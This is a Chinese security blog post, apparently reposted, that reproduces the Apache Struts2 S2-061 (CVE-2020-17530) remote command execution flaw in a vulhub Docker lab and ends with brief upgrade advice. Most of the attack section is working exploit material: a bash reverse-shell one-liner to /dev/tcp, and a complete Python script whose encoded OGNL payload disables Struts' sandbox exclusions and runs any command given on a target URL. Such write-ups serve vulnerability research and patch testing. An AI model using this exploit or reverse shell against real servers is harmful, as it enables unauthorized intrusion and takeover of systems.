Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现以及脚本编写

admin
admin
admin
102350
文章
87
评论
2022年1月6日01:07:46评论145 views字数 2415阅读8分3秒阅读模式

漏洞介绍

Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞,开发人员使用了 %{…} 语法,从而攻击者可以通过构Payload,从而造成远程代码执行。

影响版本

Apache Struts2:2.0.0 - 2.5.25

漏洞复现

1
2
3
 
https://github.com/vulhub/vulhub/tree/master/struts2/s2-061

docker-compose up -d

查看端口

1
2
3
 
╰─$ docker ps
CONTAINER ID        IMAGE                   COMMAND                  CREATED             STATUS              PORTS                    NAMES
e60ea5e361ff        vulhub/struts2:2.5.25   "/usr/local/bin/mvn-…"   34 minutes ago      Up 34 minutes       0.0.0.0:8080->8080/tcp   s2-061_struts2_1

访问漏洞环境

image-20201216194045330

测试漏洞是否存在

image-20201216194318514

直接执行命令

image-20201216201525731

反弹shell

通过在线地址将bash反弹命令进行进行编码转换

http://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/ip/port 0>&1

image-20201216210508614

image-20201216205907765

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
 
# encoding=utf-8
import requests
import sys
from lxml import etree


def exp(url,cmd):
    payload="%25%7b(%27ol4three%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d%7b%27"+cmd+"%27%7d).(%23res%3d%23exec.exec(%23cmd))%7d"
    tturl=url+"/?id="+payload
    r=requests.get(tturl)
    page=r.text
#   etree=html.etree
    page=etree.HTML(page)
    data = page.xpath('//a[@id]/@id')
    print(data[0])

if __name__=='__main__':
    print('+------------------------------------------------------------+')
    print('+ EXP: python struts2-061-poc.py http://1.1.1.1:8081 id      +')
    print('+ VER: Struts 2.0.0-2.5.25                                   +')
    print('+------------------------------------------------------------+')
    print('+ S2-061 RCE && CVE-2020-17530                               +')
    print('+------------------------------------------------------------+')
    if len(sys.argv)!=3:
        print("[+]ussage: http://ip:port command")
        print("[+]============================================================")
        sys.exit()
    url=sys.argv[1]
    cmd=sys.argv[2]
exp(url,cmd)

验证

image-20201216203912346

Goby poc 开发界面

image-20201216204623455

image-20201216205437353

image-20201216205455850

单个漏洞验证

image-20201216205525154

修复意见

将Apache Struts框架升级至最新版本

https://cwiki.apache.org/confluence/display/WW/S2-061

参考链接

https://mp.weixin.qq.com/s/rcfXIBSpNtgCFua0yUK_ew

FROM :ol4three.com | Author:ol4three

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:07:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现以及脚本编写http://cn-sec.com/archives/721084.html

发表评论

匿名网友 填写信息